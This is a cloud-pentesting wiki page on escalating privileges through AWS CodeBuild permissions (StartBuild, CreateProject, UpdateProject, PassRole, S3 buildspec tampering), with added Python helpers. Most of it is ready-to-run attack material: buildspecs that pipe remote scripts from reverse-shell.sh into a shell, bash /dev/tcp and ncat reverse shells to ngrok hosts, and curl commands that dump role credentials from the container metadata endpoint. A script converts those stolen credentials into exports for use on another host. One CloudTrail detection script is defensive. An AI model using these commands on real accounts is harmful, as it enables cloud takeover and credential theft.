AWS - Codebuild Privesc


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

codebuild

For more information see:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Having just one of these permissions is enough to trigger a build with a new buildspec and steal the token of the IAM role assigned to the project:

bash
cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
  build:
    commands:
      - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

# The flag is --project-name (there is no --project flag in the CLI)
aws codebuild start-build --project-name <project-name> --buildspec-override file:///tmp/buildspec.yml

Note: the difference between the two commands is that:

  • StartBuild starts a single build job using the specified buildspec.yml.
  • StartBuildBatch lets you start a batch of builds, for more complex setups (such as running several builds at once).

Potential Impact: Direct privesc to the AWS CodeBuild roles attached to existing projects.
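The defensive side of the same API calls: every path on this page shows up in CloudTrail as a StartBuild/StartBuildBatch call carrying a buildspecOverride, or as a CreateProject/UpdateProject call with an inline buildspec (NO_SOURCE) or a new serviceRole. The following is an added example, not code from the page or from HackTricks; the record shape follows CloudTrail's CodeBuild management events and the request-parameter names of the CodeBuild API, but the sample records are constructed and every ARN, project name and command in them is made up.

```python
import json

# Constructed CloudTrail records: the shape follows CloudTrail's CodeBuild management
# events and the request-parameter names of the CodeBuild API, but every value is made up.
SAMPLE_EVENTS = [
    {
        "eventSource": "codebuild.amazonaws.com", "eventName": "StartBuild",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
        "requestParameters": {
            "projectName": "ci-project",
            "buildspecOverride": "version: 0.2\nphases:\n  build:\n    commands:\n      - curl https://attacker.example/x | sh",
        },
    },
    {   # a normal pipeline-driven build: no override, nothing to flag
        "eventSource": "codebuild.amazonaws.com", "eventName": "StartBuild",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:role/pipeline"},
        "requestParameters": {"projectName": "ci-project"},
    },
    {
        "eventSource": "codebuild.amazonaws.com", "eventName": "UpdateProject",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
        "requestParameters": {
            "name": "ci-project",
            "source": {"type": "NO_SOURCE", "buildspec": "version: 0.2\nphases:\n  build:\n    commands:\n      - env"},
        },
    },
    {
        "eventSource": "codebuild.amazonaws.com", "eventName": "CreateProject",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
        "requestParameters": {
            "name": "codebuild-demo-project",
            "serviceRole": "arn:aws:iam::123456789012:role/codebuild-CI-Build-service-role-2",
            "source": {"type": "NO_SOURCE"},
        },
    },
]


def findings(events):
    """Return (caller_arn, reason) for each CodeBuild call matching a privesc path on this page."""
    hits = []
    for ev in events:
        if ev.get("eventSource") != "codebuild.amazonaws.com":
            continue
        name = ev.get("eventName")
        params = ev.get("requestParameters") or {}
        caller = ev.get("userIdentity", {}).get("arn", "?")
        if name in ("StartBuild", "StartBuildBatch") and "buildspecOverride" in params:
            hits.append((caller, f"{name} on {params.get('projectName')} with a buildspec override"))
        elif name in ("CreateProject", "UpdateProject"):
            src = params.get("source") or {}
            # NO_SOURCE means the buildspec is inline in the project definition
            inline = src.get("type") == "NO_SOURCE" or "buildspec" in src
            if inline:
                reason = f"{name} on {params.get('name')} with an inline buildspec"
                if "serviceRole" in params:
                    reason += f" running as {params['serviceRole']}"
                hits.append((caller, reason))
            elif name == "UpdateProject" and "serviceRole" in params:
                hits.append((caller, f"UpdateProject on {params.get('name')} swaps serviceRole to {params['serviceRole']}"))
    return hits


def scan_cloudtrail_file(path):
    """Run findings() over a CloudTrail log file of the form {"Records": [...]}."""
    with open(path) as f:
        return findings(json.load(f).get("Records", []))


if __name__ == "__main__":
    for caller, reason in findings(SAMPLE_EVENTS):
        print(f"{caller}: {reason}")
```

Run over the sample records it flags the override, the inline-buildspec update and the new project, and stays silent on the pipeline role's ordinary StartBuild. Tune the identity check to your environment: a CI role issuing StartBuild without overrides is normal, a human principal sending a buildspecOverride rarely is.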

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

An attacker with the iam:PassRole, codebuild:CreateProject and codebuild:StartBuild or codebuild:StartBuildBatch permissions could escalate privileges to any CodeBuild IAM role by creating a project that runs with it.

bash
# Option 1: dump the environment and the role credentials (the output lands in the build logs)
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: get a reverse shell (this assignment overrides option 1; keep only the one you want)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# Inside bash double quotes \\\\n collapses to \\n, and printf below turns that into
# the two-character \n escape that JSON expects inside the buildspec string
JSON="{
  \"name\": \"codebuild-demo-project\",
  \"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
  },
  \"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
  },
  \"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"aws/codebuild/standard:1.0\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\"
  },
  \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potential Impact: Direct privesc to any AWS CodeBuild role.

warning

In a CodeBuild container the file /codebuild/output/tmp/env.sh contains all the env vars needed to reach the metadata credentials.

This file contains the env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which holds the URL path to access the credentials. It will look something like /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Append that to the URL http://169.254.170.2/ and you will be able to dump the role credentials.

It also contains the env variable ECS_CONTAINER_METADATA_URI, which holds the full URL to get metadata info about the container.
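What you actually do with env.sh once inside the container, as an added example (not code from the page): parse the exports, build the credentials URL from AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, and turn the JSON the endpoint returns into exports you can paste into a local shell. The env.sh contents and the credential response below are constructed samples with made-up values; the response field names (RoleArn, AccessKeyId, SecretAccessKey, Token, Expiration) are the ECS container-credentials format this endpoint speaks. Only fetch_credentials() talks to the network, and only works from inside the build container.

```python
import json
import re
import shlex
from urllib.request import urlopen  # used only by fetch_credentials(); everything else is offline

METADATA_HOST = "http://169.254.170.2"

# Constructed sample of /codebuild/output/tmp/env.sh (all values made up)
SAMPLE_ENV_SH = """\
export AWS_CONTAINER_CREDENTIALS_RELATIVE_URI="/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420"
export ECS_CONTAINER_METADATA_URI="http://169.254.170.2/v3/0123456789abcdef"
export CODEBUILD_BUILD_ARN="arn:aws:codebuild:us-east-1:123456789012:build/demo:0a1b2c3d"
export CODEBUILD_SRC_DIR=/codebuild/output/src123/src
"""

# Constructed sample of the credentials endpoint's response (ECS container-credentials format)
SAMPLE_CREDS_JSON = json.dumps({
    "RoleArn": "arn:aws:iam::123456789012:role/codebuild-CI-Build-service-role",
    "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "Token": "FwoGZXIvYXdzEXAMPLETOKEN",
    "Expiration": "2030-01-01T00:00:00Z",
})


def parse_env_sh(text):
    """Turn 'export KEY="value"' / 'KEY=value' lines into a dict, honouring shell quoting."""
    env = {}
    for line in text.splitlines():
        m = re.match(r'^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$', line)
        if not m:
            continue
        key, raw = m.groups()
        try:
            parts = shlex.split(raw)
            env[key] = parts[0] if parts else ""
        except ValueError:  # unbalanced quotes: keep the raw text rather than drop the var
            env[key] = raw
    return env


def credentials_url(env):
    """Full URL of the role credentials; fails loudly outside a container-credentials environment."""
    rel = env.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI")
    if not rel:
        raise KeyError("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI not set: not a CodeBuild/ECS container")
    return METADATA_HOST + rel


def creds_to_exports(creds_json):
    """Convert the endpoint's JSON into export lines usable with the AWS CLI on another host."""
    c = json.loads(creds_json)
    return "\n".join([
        f'export AWS_ACCESS_KEY_ID="{c["AccessKeyId"]}"',
        f'export AWS_SECRET_ACCESS_KEY="{c["SecretAccessKey"]}"',
        f'export AWS_SESSION_TOKEN="{c["Token"]}"',
        f'# role {c.get("RoleArn", "?")} expires {c.get("Expiration", "?")}',
    ])


def fetch_credentials(env):
    """Live path: only reachable from inside the build container."""
    with urlopen(credentials_url(env), timeout=3) as r:
        return r.read().decode()


if __name__ == "__main__":
    env = parse_env_sh(SAMPLE_ENV_SH)
    print(credentials_url(env))
    print(creds_to_exports(SAMPLE_CREDS_JSON))
```

Inside a real build you would replace SAMPLE_ENV_SH with open("/codebuild/output/tmp/env.sh").read() and SAMPLE_CREDS_JSON with fetch_credentials(env); the session token is mandatory, since these are temporary role credentials.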

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

As in the previous section, but instead of creating a build project you modify an existing one: you can point it at a different IAM role and steal that role's token

bash
REV_PATH="/tmp/codebuild_pwn.json"

# Option 1: dump the environment and the role credentials
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: get a reverse shell (overrides option 1; keep only the one you want)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# Use the name of the existing project you want to modify
JSON="{
  \"name\": \"<codebuild-demo-project>\",
  \"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
  },
  \"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
  },
  \"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"aws/codebuild/standard:1.0\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\"
  },
  \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name <codebuild-demo-project> --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name <codebuild-demo-project>

Potential Impact: Direct privesc to any AWS CodeBuild role.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

As in the previous section but without the iam:PassRole permission: you can abuse these permissions to modify existing CodeBuild projects and reach the roles they already have attached.

sh
REV_PATH="/tmp/codebuild_pwn.json"

# Option 1: dump the environment and the role credentials
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: get a reverse shell (overrides option 1; keep only the one you want)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# No serviceRole is sent, so the project keeps the role it already has
JSON="{
  \"name\": \"<codebuild-demo-project>\",
  \"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
  },
  \"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
  },
  \"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\",
    \"imagePullCredentialsType\": \"CODEBUILD\"
  }
}"

# Note that an image from the AWS public ECR is used instead of one from Docker Hub, because Docker Hub rate-limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name <codebuild-demo-project>

Potential Impact: Direct privesc to the AWS CodeBuild roles attached to existing projects.
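The three project-definition variants above (create with PassRole, update with a new role, update without PassRole) differ only in whether a serviceRole is sent, and the hand-escaped printf JSON is the fragile part. Here is an added example that is not part of the page: it renders the same definition with json.dumps so commands containing $VAR, pipes or quotes need no manual escaping, and omits serviceRole when you lack iam:PassRole. The account ID, role ARN, project names and image are placeholders to replace, not values taken from the page.

```python
import json

# Placeholders, not values from the page: set these to the target account, role and image.
ACCOUNT_ID = "123456789012"
SERVICE_ROLE_ARN = f"arn:aws:iam::{ACCOUNT_ID}:role/codebuild-CI-Build-service-role-2"
IMAGE = "public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest"  # public ECR avoids Docker Hub rate limits

# Commands that dump the environment and the role credentials from inside the build container.
CREDS_DUMP = [
    "env",
    "curl -s http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
]


def render_buildspec(commands, phase="build"):
    """Build the buildspec text. Each command is emitted as a JSON-style double-quoted
    scalar (valid YAML), so `$VAR`, `|`, `>&` and quotes survive without hand-escaping;
    the shell inside the container still expands $VAR at run time."""
    lines = ["version: 0.2", "", "phases:", f"  {phase}:", "    commands:"]
    lines += [f"      - {json.dumps(c)}" for c in commands]
    return "\n".join(lines) + "\n"


def project_definition(name, commands, service_role=None, image=IMAGE):
    """Request body for create-project / update-project --cli-input-json.
    With service_role=None no serviceRole key is sent at all, which is the shape the
    no-PassRole variant uses: update-project then leaves the project's current role in place."""
    body = {
        "name": name,
        "source": {"type": "NO_SOURCE", "buildspec": render_buildspec(commands)},
        "artifacts": {"type": "NO_ARTIFACTS"},
        "environment": {
            "type": "LINUX_CONTAINER",
            "image": image,
            "computeType": "BUILD_GENERAL1_SMALL",
            "imagePullCredentialsType": "CODEBUILD",
        },
    }
    if service_role:
        body["serviceRole"] = service_role
    return body


def cli_input_json(body):
    """json.dumps performs the \\n and quote escaping the printf approach does by hand."""
    return json.dumps(body, indent=2)


def write_definition(path, body):
    with open(path, "w") as f:
        f.write(cli_input_json(body))
    return path


if __name__ == "__main__":
    # With iam:PassRole: create a new project bound to the chosen role.
    create = project_definition("codebuild-demo-project", CREDS_DUMP, service_role=SERVICE_ROLE_ARN)
    write_definition("/tmp/create.json", create)
    # Without iam:PassRole: only replace the buildspec of an existing project.
    update = project_definition("existing-project", CREDS_DUMP)
    write_definition("/tmp/update.json", update)
    print("aws codebuild create-project --cli-input-json file:///tmp/create.json")
    print("aws codebuild update-project --cli-input-json file:///tmp/update.json")
    print("aws codebuild start-build --project-name codebuild-demo-project")
```

Feed the written file to the same create-project / update-project / start-build commands the page shows; swapping CREDS_DUMP for a reverse-shell command changes nothing else.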

SSM

If you have enough permissions to start an ssm session, it's possible to get inside the CodeBuild project while it is being built.

The CodeBuild project will need to have a breakpoint in its buildspec, the build must be started with the debug session enabled (start-build --debug-session-enabled), and the project's service role needs the SSM permissions described in the docs:

phases:
  pre_build:
    commands:
      - echo Entered the pre_build phase...
      - echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

And then (the sessionTarget is in the debugSession field of the build description):

bash
aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

For more information check the docs.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

An attacker who can start/restart a build of a specific CodeBuild project that pulls its buildspec.yml from an S3 bucket the attacker can write to can get command execution inside the CodeBuild process.

Note: this escalation is only relevant if the CodeBuild worker runs under a role different from, and ideally more privileged than, the attacker's own.

bash
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_build > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

You can use a buildspec like this one to get a reverse shell:

buildspec.yml
version: 0.2

phases:
  build:
    commands:
      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impact: Direct privesc to the role used by the AWS CodeBuild worker, which usually has elevated permissions.

warning

Note that the buildspec may be expected in zip format, so the attacker would need to download it, unzip it, modify the buildspec.yml in the root directory, zip it again and upload it.

More details can be found here.

Potential Impact: Direct privesc to the AWS CodeBuild roles attached to existing projects.
